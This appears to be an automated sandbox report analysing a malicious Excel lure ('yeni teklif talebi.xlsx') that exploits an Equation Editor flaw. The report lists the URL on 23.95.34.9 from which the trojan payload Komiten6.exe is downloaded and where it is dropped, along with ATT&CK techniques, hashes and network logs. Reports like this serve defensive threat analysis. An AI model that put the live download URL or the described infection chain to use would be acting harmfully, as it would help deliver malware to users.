    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Scripting
    Path Interception1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping21
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth33
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution
    Logon Script (Windows)Logon Script (Windows)1
    Access Token Manipulation
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Scripting
    LSA Secrets15
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Obfuscated Files or Information
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    yeni teklif talebi.xlsx22%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Komiten6[1].exe38%VirustotalBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Komiten6[1].exe24%ReversingLabsWin32.Trojan.Nemesis
    C:\Users\user\AppData\Local\Temp\nshD0AF.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nshD0AF.tmp\System.dll0%ReversingLabs
    C:\Users\Public\vbc.exe24%ReversingLabsWin32.Trojan.Nemesis
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://23.95.34.9/zaki/Komiten6.exej0%Avira URL Cloudsafe
    http://23.95.34.9/zaki/Komiten6.exe0%Avira URL Cloudsafe
    http://23.95.34.9/zaki/Komiten6.exemmC:0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://23.95.34.9/zaki/Komiten6.exetrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://23.95.34.9/zaki/Komiten6.exejEQNEDT32.EXE, 00000002.00000002.955909321.00000000036A0000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.1166019325.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.954551791.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, Komiten6[1].exe.2.drfalse
      high
      http://23.95.34.9/zaki/Komiten6.exemmC:EQNEDT32.EXE, 00000002.00000002.955420240.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      23.95.34.9
      unknownUnited States
      36352AS-COLOCROSSINGUStrue
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:626603
      Start date and time: 14/05/202215:21:202022-05-14 15:21:20 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 47s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:yeni teklif talebi.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/15@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 62.8% (good quality ratio 61.6%)
      • Quality average: 88.9%
      • Quality standard deviation: 21%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .xlsx
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      15:22:38API Interceptor74x Sleep call for process: EQNEDT32.EXE modified
      15:22:44API Interceptor1x Sleep call for process: vbc.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:downloaded
      Size (bytes):122206
      Entropy (8bit):7.709922432740692
      Encrypted:false
      SSDEEP:3072:7fY/TU9fE9PEtuQb6VLH/hh0Spsnf60c0b2QrSfskuai8:LYa6Y6VLHH5yyLiau8
      MD5:5D160471A3168EAC0D8C34060B4F357B
      SHA1:B33D39C20CE8F3F97AEB4C53A25B4C0D525D020D
      SHA-256:3B2B83A13CC3642737C03105CF90061671172970A97BB02967E11CF30D239C18
      SHA-512:40AF820B35F66B9080D0F2127B1889D3232FF77AE736B8DBB7378DC8E5BF561DC6961868D144170083F772E82583A795131BBDD82DB2C21AF5C5B1CE20034886
      Malicious:true
      Antivirus:
      • Antivirus: Virustotal, Detection: 38%, Browse
      • Antivirus: ReversingLabs, Detection: 24%
      Reputation:low
      IE Cache URL:http://23.95.34.9/zaki/Komiten6.exe
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):1970
      Entropy (8bit):5.125773446782967
      Encrypted:false
      SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
      MD5:30935B0D56A69E2E57355F8033ADF98B
      SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
      SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
      SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):223752
      Entropy (8bit):3.2805343869701504
      Encrypted:false
      SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
      MD5:8E3A74F7AA420B02D34C69E625969C0A
      SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
      SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
      SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):4630
      Entropy (8bit):5.070400845866794
      Encrypted:false
      SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
      MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
      SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
      SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
      SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):1970
      Entropy (8bit):5.125773446782967
      Encrypted:false
      SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
      MD5:30935B0D56A69E2E57355F8033ADF98B
      SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
      SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
      SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
      Malicious:false
      Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):4630
      Entropy (8bit):5.070400845866794
      Encrypted:false
      SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
      MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
      SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
      SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
      SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
      Malicious:false
      Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):95783
      Entropy (8bit):7.121872132405946
      Encrypted:false
      SSDEEP:1536:+8HtWLvDZBpUZ6Mr6D9/cMDL7f/Doi8yrn+GqGiYhUF5MsdWyO:7Hk1UZ6Mr6DdcKEfyAGcMsd5O
      MD5:44E3D740FEB747BEBF0BEE4F7B5DD6A4
      SHA1:B26435DFC0A697122BE409CC50009C46952F45A2
      SHA-256:AA368E099899170E23097E632589756230F2A359B818CE169AEDF39F60F22946
      SHA-512:6E82789F31D13106D29797567561747D86BF1FA706B2D0C02CA477F18ACE233FC7AB31B02FC9E65508FE5950237A38D828E023082BA9EF6D63274FE746871290
      Malicious:false
      Preview:...<N.............L.....<...)<.....Z..n.Y.....M<W....."..B..s.......<T...<=........._..?<........I..#........1<....<.....z..u1........k....Y............<....<g........................(..".....c<...I.4."..r...<...-<...Z........`..2..L..!........-.."...<...2<.............l..^.....v...x..u......}..w..k<....<..................h..............<...M<...M............. ............r"..9..C..................................................................................?..H...B...@..&..o..EJ.F.-.0.i...1.9.*..T(.a.\..g..L.O..>UP..UK.wOjc_....hZI......W....Z^.=..Ph~7p.Ay.../....\..D..|.....G.l...@.+.6L..'.YV..af.zF.5x....w{7K;-H.Y...1.XC........>...8..}.Mb.....[ *;....R...g.. )......f..Z...........................................N..............................................................."...................................................................................2................................................................D@.................
      Process:C:\Users\Public\vbc.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):52
      Entropy (8bit):4.416383950195573
      Encrypted:false
      SSDEEP:3:AAToJ2wKyuzYAWY50p:AlJ2wKHhfep
      MD5:DD534946646E90AE1A0F38B04F9E8611
      SHA1:95FBD883E6AF911D062E6FDF9EBAA8C433AC1B16
      SHA-256:70A337B2556FA5405CB165F7E68FE601D5600F88572A85FBCBB7272F2364A082
      SHA-512:5A8B696949018FC79F71F1AEEA3C2F3131A0C6207A59F97AA3B29E8CC26383CDFF76EDDDF8085404DF8229BE29D20FB4831E0158EFD4638C52BE7BE014F829ED
      Malicious:false
      Preview:[computersamplede]..Forureningsfarernes=Reinvald81..
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:modified
      Size (bytes):12288
      Entropy (8bit):5.814115788739565
      Encrypted:false
      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
      MD5:CFF85C549D536F651D4FB8387F1976F2
      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
      Malicious:false
      Antivirus:
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:CDFV2 Encrypted
      Category:dropped
      Size (bytes):96256
      Entropy (8bit):7.917788982548629
      Encrypted:false
      SSDEEP:1536:HmtaB2E29Zo12SxOn/N2mnG+Ol84U5YhIciGc0vh5ne+WRWrcUVFaBkdz8jjVHqt:HwE28Dr6Grrh4055nevbUmBkopiUlC
      MD5:B32D7BAC7FB9B903EA73A041F13D3B61
      SHA1:359458F03B700820C3B4F5FC1838EF7EA0D3CD14
      SHA-256:35BFBA75E0BC2A473EE9964F138ACD21381DDF6FD196B35127A304FA61B87826
      SHA-512:B5AA85839138D9E5449859CE6DAFC2D11B9168347BA9FA384392A3BEB241ACBFED711E52DB1BFFDF9933BD04E40C63BFB7A263314F81D875337E3C02F58025FB
      Malicious:false
      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):165
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
      MD5:797869BB881CFBCDAC2064F92B26E46F
      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
      Malicious:true
      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):122206
      Entropy (8bit):7.709922432740692
      Encrypted:false
      SSDEEP:3072:7fY/TU9fE9PEtuQb6VLH/hh0Spsnf60c0b2QrSfskuai8:LYa6Y6VLHH5yyLiau8
      MD5:5D160471A3168EAC0D8C34060B4F357B
      SHA1:B33D39C20CE8F3F97AEB4C53A25B4C0D525D020D
      SHA-256:3B2B83A13CC3642737C03105CF90061671172970A97BB02967E11CF30D239C18
      SHA-512:40AF820B35F66B9080D0F2127B1889D3232FF77AE736B8DBB7378DC8E5BF561DC6961868D144170083F772E82583A795131BBDD82DB2C21AF5C5B1CE20034886
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 24%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
      File type:CDFV2 Encrypted
      Entropy (8bit):7.917788982548629
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:yeni teklif talebi.xlsx
      File size:96256
      MD5:b32d7bac7fb9b903ea73a041f13d3b61
      SHA1:359458f03b700820c3b4f5fc1838ef7ea0d3cd14
      SHA256:35bfba75e0bc2a473ee9964f138acd21381ddf6fd196b35127a304fa61b87826
      SHA512:b5aa85839138d9e5449859ce6dafc2d11b9168347ba9fa384392a3beb241acbfed711e52db1bffdf9933bd04e40c63bfb7a263314f81d875337e3c02f58025fb
      SSDEEP:1536:HmtaB2E29Zo12SxOn/N2mnG+Ol84U5YhIciGc0vh5ne+WRWrcUVFaBkdz8jjVHqt:HwE28Dr6Grrh4055nevbUmBkopiUlC
      TLSH:B493F174775AA718FEA3B2725DFA3EB7058B1F013878CE01DD953B0A13B67980931921
      File Content Preview:........................>......................................................................................................................................................................................................................................
      Icon Hash:e4e2aa8aa4b4bcb4
      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      192.168.2.2223.95.34.949171802022550 05/14/22-15:22:35.305181TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164917180192.168.2.2223.95.34.9
      TimestampSource PortDest PortSource IPDest IP
      May 14, 2022 15:22:35.127046108 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.303962946 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.304061890 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.305181026 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484261990 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484304905 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484325886 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484344006 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484348059 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484370947 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484375000 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484380007 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484395027 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484415054 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484415054 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484436989 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484436989 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484458923 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484460115 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484494925 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484500885 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.484508038 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.484549999 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.540580034 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661204100 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661242008 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661266088 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661279917 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661290884 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661312103 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661319017 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661335945 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661358118 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661360025 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661377907 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661386013 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661408901 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661411047 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661422968 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661432981 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661442041 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661456108 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661477089 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661478996 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661492109 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661504030 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661510944 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661528111 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661537886 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661550999 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661564112 CEST4917180192.168.2.2223.95.34.9
      May 14, 2022 15:22:35.661573887 CEST804917123.95.34.9192.168.2.22
      May 14, 2022 15:22:35.661582947 CEST4917180192.168.2.2223.95.34.9
